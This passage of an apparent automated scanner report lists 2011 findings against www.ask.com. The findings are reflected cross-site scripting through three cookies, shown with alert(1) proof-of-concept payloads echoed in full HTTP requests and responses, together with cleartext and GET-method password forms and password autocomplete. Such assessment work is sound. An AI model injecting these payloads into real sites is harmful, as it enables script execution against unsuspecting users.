puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:18 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjE4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:18 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:18 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 59473 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]... st.height = 1; st.width = 1; st.id = "SessionTracker"; st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=ph&l=dir&o=0&ld=5489&sv=0a5c4070&p=pictureslanding&rf=0&ord=4433187&wz_cu=0284b6"-alert(1)-"2961042f29c "; </script>...[SNIP]...
1.26. http://www.ask.com/pictureslanding [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictureslanding
Issue detail
The value of the wz_cu cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6fc8"><script>alert(1)</script>dbb23d0e710 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pictureslanding?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0b6fc8"><script>alert(1)</script>dbb23d0e710 ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:17 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjE3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:17 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:17 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 59655 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]... <img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=ph&l=dir&o=0&ld=5489&sv=0a5c4073&p=pictureslanding&rf=0&ord=4356532&wz_cu=0b6fc8"><script>alert(1)</script>dbb23d0e710 " height=1 width=1 id="SessionTracker" />...[SNIP]...
1.27. http://www.ask.com/pictureslanding [wz_sid cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictureslanding
Issue detail
The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0e83'-alert(1)-'992fae9488d was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pictureslanding?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3a0e83'-alert(1)-'992fae9488d ; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:25 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjI1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:25 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:25 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 59165 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]... <iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=0144DB8DB86BB2CFE0A8DECE14D761F3a0e83'-alert(1)-'992fae9488d ;u3=0;u2=;ord=-1164671048?" width="1" height="1" frameborder="0">...[SNIP]...
1.28. http://www.ask.com/pictureslanding [wz_uid cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictureslanding
Issue detail
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d366'-alert(1)-'85dbf415022 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pictureslanding?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F34d366'-alert(1)-'85dbf415022 ; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:23 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjIzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:23 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:23 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 61892 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]... <iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0845DB8DB66BB2CFE0A8DECE14D761F34d366'-alert(1)-'85dbf415022 ;u4=0144DB8DB86BB2CFE0A8DECE14D761F3;u3=0;u2=;ord=-808111521?" width="1" height="1" frameborder="0">...[SNIP]...
2. Cleartext submission of password
Summary
Severity: High
Confidence: Certain
Host: http://www.ask.com
Path: /ja-ask-dialog
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.ask.com/ja-check-user
The form contains the following password fields:
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]... </div> <form name="signupform" id="signupform" style="display:block" action="http://www.ask.com/ja-check-user" method="POST"> <fieldset>...[SNIP]... <div class="signup_col2"> <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ask_dialog.validatePassword();" id="dialog_password" name="password" tabindex="0" class="txtin txt3 abstract"> </div>...[SNIP]... <div class="signup_col2"> <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ask_dialog.confirmPassword();" id="dialog_password2" name="password2" tabindex="0" class="txtin txt3 abstract"> </div>...[SNIP]...
3. Password field submitted using GET method
There are 2 instances of this issue:
3.1. http://www.ask.com/ja-ask-dialog
Summary
Severity: Low
Confidence: Certain
Host: http://www.ask.com
Path: /ja-ask-dialog
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method: https://secure.ask.com/ja-authenticate
The form contains the following password field:
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]... <div style="float:left;"> <form name="signinform" id="signinform" action="https://secure.ask.com/ja-authenticate" method="GET"> <input type="hidden" name="engine_id" value="sign_in">...[SNIP]... </div> <input tabindex="0" style="width:240px;" type="password" id="signin_password" name="password" class="txtin"> </div>...[SNIP]...
3.2. http://www.ask.com/ja-ask-dialog
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.ask.com
Path:
/ja-ask-dialog
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:
https://secure.ask.com/ja-authenticate
The form contains the following password field:
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]... </div> <form name="linkacctform" id="linkacctform" action="https://secure.ask.com/ja-authenticate" method="GET"> <input type="hidden" name="engine_id" value="sign_in">...[SNIP]... </div> <input tabindex="0" style="width:240px;" type="password" id="linkacct_password" name="password" class="txtin"> <div style="margin-top:10px" class="askq_show">...[SNIP]...
4. Password field with autocomplete enabled
There are 3 instances of this issue:
4.1. http://www.ask.com/ja-ask-dialog
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.ask.com
Path:
/ja-ask-dialog
Issue detail
The page contains a form with the following action URL:
https://secure.ask.com/ja-authenticate
The form contains the following password field with autocomplete enabled:
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]... </div> <form name="linkacctform" id="linkacctform" action="https://secure.ask.com/ja-authenticate" method="GET"> <input type="hidden" name="engine_id" value="sign_in">...[SNIP]... </div> <input tabindex="0" style="width:240px;" type="password" id="linkacct_password" name="password" class="txtin"> <div style="margin-top:10px" class="askq_show">...[SNIP]...
4.2. http://www.ask.com/ja-ask-dialog
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.ask.com
Path:
/ja-ask-dialog
Issue detail
The page contains a form with the following action URL:
http://www.ask.com/ja-check-user
The form contains the following password fields with autocomplete enabled:
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]... </div> <form name="signupform" id="signupform" style="display:block" action="http://www.ask.com/ja-check-user" method="POST"> <fieldset>...[SNIP]... <div class="signup_col2"> <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ask_dialog.validatePassword();" id="dialog_password" name="password" tabindex="0" class="txtin txt3 abstract"> </div>...[SNIP]... <div class="signup_col2"> <input style="width:262px;margin-right:10px" type="password" onchange="JASK.ask_dialog.confirmPassword();" id="dialog_password2" name="password2" tabindex="0" class="txtin txt3 abstract"> </div>...[SNIP]...
4.3. http://www.ask.com/ja-ask-dialog
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.ask.com
Path:
/ja-ask-dialog
Issue detail
The page contains a form with the following action URL:
https://secure.ask.com/ja-authenticate
The form contains the following password field with autocomplete enabled:
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]... <div style="float:left;"> <form name="signinform" id="signinform" action="https://secure.ask.com/ja-authenticate" method="GET"> <input type="hidden" name="engine_id" value="sign_in">...[SNIP]... </div> <input tabindex="0" style="width:240px;" type="password" id="signin_password" name="password" class="txtin"> </div>...[SNIP]...
5. Referer-dependent response
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.ask.com
Path:
/answers/7153311/is-nail-polish-bad-for-your-nails
Request 1
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response 1
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:09:53 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118233 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... text/javascript"> var st = new Image(); st.height = 1; st.width = 1; st.id = "SessionTracker"; st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407b&p=ja-question&rf=0&ord=7813837&wz_cu=0"; </script> <noscript><img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407b&p=ja-question&rf=0&ord=7813837&wz_cu=0" height=1 width=1 id="SessionTracker" /></noscript> </span> <div id="ask_question_dialog"></div> <div id="ask_question_dialog_container" style="display:none"></div> <div id="asDlgWrap" style="overflow:hidden"></div> <div id="serp_ftr" class="ask-mrl15" style="margin-bottom:4px;margin-top:4px" > <a href="/about" onmousedown="return ct(this,30771)" class="txt2 info l_nu" target="_top"> About</a> <span class="txt2 info" style="padding:0 5px 0 5px;">-</span> <a href="/about/legal/privacy" onmousedown="return ct(this,30771)" class="txt2 info l_nu" target="_top"> Privacy</a> <span class="txt2 info" style="padding:0 5px 0 5px;">-</span> <a href="http://www.ask.com/settings#askeraser" class="txt2 info l_nu" onClick="">AskEraser</a> <span class="txt2 info" 
style="padding:0 5px 0 5p...[SNIP]...
Request 2
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; 